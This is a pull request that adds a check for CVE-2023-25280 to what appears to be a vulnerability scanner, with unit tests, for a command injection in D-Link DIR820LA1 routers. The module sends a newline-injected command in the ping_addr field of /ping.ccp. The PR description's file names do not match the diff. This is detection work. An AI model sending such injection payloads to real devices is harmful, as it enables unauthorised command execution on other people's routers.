### PR TITLE
Add CVE-2023-25280

### DIFF
--- a/agent/exploits/cve_2023_25280.py
+++ b/agent/exploits/cve_2023_25280.py
@@ -18,6 +18,8 @@ RISK_RATING = "CRITICAL"
 MAX_REDIRECTS = 2
 DEFAULT_TIMEOUT = 90
 
+UNIQUE_VALUE = "44253432"  # Result of 123*456*789
+
 
 @exploits_registry.register
 class DLinkDIR820LA1CommandInjectionExploit(webexploit.WebExploit):
@@ -46,7 +48,7 @@ class DLinkDIR820LA1CommandInjectionExploit(webexploit.WebExploit):
 
         target_endpoint = urlparse.urljoin(target.origin, self.check_request.path)
 
-        payload = {"ccp_act": "pingV4Msg", "ping_addr": "%0aecho vulnerable%0a"}
+        payload = {"ccp_act": "pingV4Msg", "ping_addr": "%0aexpr 123 \* 456 \* 789%0a"}
 
         try:
             resp = session.post(
@@ -59,7 +61,7 @@ class DLinkDIR820LA1CommandInjectionExploit(webexploit.WebExploit):
             logging.error("HTTP Request failed: %s", e)
             return []
 
-        if "vulnerable" in resp.text:
+        if UNIQUE_VALUE in resp.text:
             vulnerability = self._create_vulnerability(target)
             return [vulnerability]
         else:

--- a/agent/exploits/cve_2023_25280.py
+++ b/agent/exploits/cve_2023_25280.py
@@ -64,5 +64,4 @@ class DLinkDIR820LA1CommandInjectionExploit(webexploit.WebExploit):
         if UNIQUE_VALUE in resp.text:
             vulnerability = self._create_vulnerability(target)
             return [vulnerability]
-        else:
-            return []
+        return []

--- a/agent/exploits/cve_2023_25280.py
+++ b/agent/exploits/cve_2023_25280.py
@@ -1,0 +1,66 @@
+"""Agent Asteroid implementation for CVE-2023-25280"""
+
+import logging
+import re
+from urllib import parse as urlparse
+
+import requests
+
+from agent import definitions
+from agent import exploits_registry
+from agent.exploits import webexploit
+
+VULNERABILITY_TITLE = "Command Injection in D-Link DIR820LA1"
+VULNERABILITY_REFERENCE = "CVE-2023-25280"
+VULNERABILITY_DESCRIPTION = """A command injection vulnerability exists in pingV4Msg of component "/ping.ccp" of D-Link DIR820LA1_FW105B03, allowing an attacker to elevate privileges to root via a crafted payload."""
+RISK_RATING = "CRITICAL"
+
+MAX_REDIRECTS = 2
+DEFAULT_TIMEOUT = 90
+
+
+@exploits_registry.register
+class DLinkDIR820LA1CommandInjectionExploit(webexploit.WebExploit):
+    accept_request = definitions.Request(method="GET", path="/")
+    check_request = definitions.Request(method="POST", path="/ping.ccp")
+    accept_pattern = [re.compile(r"<a href=\"http://www.dlink.com/us/en/support\">")]
+    metadata = definitions.VulnerabilityMetadata(
+        title=VULNERABILITY_TITLE,
+        description=VULNERABILITY_DESCRIPTION,
+        reference=VULNERABILITY_REFERENCE,
+        risk_rating=RISK_RATING,
+    )
+
+    def check(self, target: definitions.Target) -> list[definitions.Vulnerability]:
+        """Rule to detect the command injection vulnerability on a specific target.
+
+        Args:
+            target: Target to scan
+
+        Returns:
+            List of identified vulnerabilities.
+        """
+        session = requests.Session()
+        session.max_redirects = MAX_REDIRECTS
+        session.verify = False
+
+        target_endpoint = urlparse.urljoin(target.origin, self.check_request.path)
+
+        payload = {"ccp_act": "pingV4Msg", "ping_addr": "%0aecho vulnerable%0a"}
+
+        try:
+            resp = session.post(
+                target_endpoint,
+                data=payload,
+                timeout=DEFAULT_TIMEOUT,
+                headers={"Content-Type": "application/x-www-form-urlencoded"},
+            )
+        except requests.RequestException as e:
+            logging.error("HTTP Request failed: %s", e)
+            return []
+
+        if "vulnerable" in resp.text:
+            vulnerability = self._create_vulnerability(target)
+            return [vulnerability]
+        else:
+            return []

--- a/tests/exploits/cve_2023_25280_test.py
+++ b/tests/exploits/cve_2023_25280_test.py
@@ -18,7 +18,7 @@ def testCVE202325280_whenVulnerable_reportFinding(
     )
     requests_mock.post(
         "http://localhost:80/ping.ccp",
-        text="vulnerable",
+        text="44253432",
         status_code=200,
     )
     exploit_instance = cve_2023_25280.DLinkDIR820LA1CommandInjectionExploit()

--- a/tests/exploits/cve_2023_25280_test.py
+++ b/tests/exploits/cve_2023_25280_test.py
@@ -1,0 +1,87 @@
+"""Unit tests for Agent Asteroid: CVE-2023-25280"""
+
+import requests
+import requests_mock as req_mock
+
+from agent import definitions
+from agent.exploits import cve_2023_25280
+
+
+def testCVE202325280_whenVulnerable_reportFinding(
+    requests_mock: req_mock.mocker.Mocker,
+) -> None:
+    """CVE-2023-25280 unit test: case when target is vulnerable."""
+    requests_mock.get(
+        "http://localhost:80/",
+        text='<td width="100%">&nbsp;&nbsp;<script>show_words(\'TA2\')</script>: <a href="http://www.dlink.com/us/en/support"><script>document.write(model);</script></a></td>',
+        status_code=200,
+    )
+    requests_mock.post(
+        "http://localhost:80/ping.ccp",
+        text="vulnerable",
+        status_code=200,
+    )
+    exploit_instance = cve_2023_25280.DLinkDIR820LA1CommandInjectionExploit()
+    target = definitions.Target("http", "localhost", 80)
+
+    vulnerabilities = exploit_instance.check(target)
+    accept = exploit_instance.accept(target)
+
+    assert accept is True
+    assert len(vulnerabilities) == 1
+    vulnerability = vulnerabilities[0]
+    assert vulnerability.entry.title == "Command Injection in D-Link DIR820LA1"
+    assert vulnerability.technical_detail == (
+        "http://localhost:80 is vulnerable to CVE-2023-25280, "
+        "Command Injection in D-Link DIR820LA1"
+    )
+
+
+def testCVE202325280_whenSafe_reportNothing(
+    requests_mock: req_mock.mocker.Mocker,
+) -> None:
+    """CVE-2023-25280 unit test: case when target is safe."""
+    requests_mock.post(
+        "http://localhost:80/ping.ccp",
+        text="whatever",
+        status_code=200,
+    )
+    exploit_instance = cve_2023_25280.DLinkDIR820LA1CommandInjectionExploit()
+    target = definitions.Target("http", "localhost", 80)
+
+    vulnerabilities = exploit_instance.check(target)
+
+    assert len(vulnerabilities) == 0
+
+
+def testCVE202325280_whenRequestException_doesNotCrash(
+    requests_mock: req_mock.mocker.Mocker,
+) -> None:
+    """CVE-2023-25280 unit test: case when a request exception occurs."""
+    requests_mock.post(
+        "http://localhost:80/ping.ccp",
+        exc=requests.RequestException("Connection error"),
+    )
+    exploit_instance = cve_2023_25280.DLinkDIR820LA1CommandInjectionExploit()
+    target = definitions.Target("http", "localhost", 80)
+
+    vulnerabilities = exploit_instance.check(target)
+
+    assert len(vulnerabilities) == 0
+
+
+def testCVE202325280_whenNotDLinkDIR820LA1_doesNotAccept(
+    requests_mock: req_mock.mocker.Mocker,
+) -> None:
+    """CVE-2023-25280 unit test: case when target is not D-Link DIR820LA1."""
+    requests_mock.get(
+        "http://localhost:80/",
+        text="<title>Apache</title>",
+        status_code=200,
+    )
+    exploit_instance = cve_2023_25280.DLinkDIR820LA1CommandInjectionExploit()
+    target = definitions.Target("http", "localhost", 80)
+
+    accept = exploit_instance.accept(target)
+
+    assert accept is False


### PR DESCRIPTION
### Summary

This PR introduces an exploit for CVE-2023-25280, a command injection vulnerability in the D-Link DIR820LA1 router firmware version FW105B03. This vulnerability allows attackers to execute arbitrary commands with elevated privileges. The exploit is based on an in-depth analysis of the vulnerability, as no live targets were found for testing.

### Changes

- Implemented DLinkDIR820LA1CommandInjectionExploit class in agent/exploits/dlink_dir820la1_command_injection.py
- Added unit tests in tests/exploits/test_dlink_dir820la1_command_injection.py

### Implementation Details

The exploit script performs the following actions:

- Identifies D-Link DIR820LA1 instances by checking for a specific support link in the HTML.
- Scans the target by sending a POST request to /ping.ccp with a crafted payload designed to trigger the command injection vulnerability.
- Checks the response to determine if the target is vulnerable by looking for the presence of a specific keyword in the response body.

### Testing

The unit tests cover the following scenarios:

- Detecting a vulnerable D-Link DIR820LA1 instance
- Correctly identifying a non-vulnerable (safe) D-Link DIR820LA1 instance
- Handling request exceptions gracefully
- Rejecting targets that are not D-Link DIR820LA1 devices

As there were no live targets available for testing, the exploit was validated solely by the actual [analysis](https://github.com/migraine-sudo/D_Link_Vuln/tree/main/cmd%20Inject%20in%20pingV4Msg) that was made on this CVE: 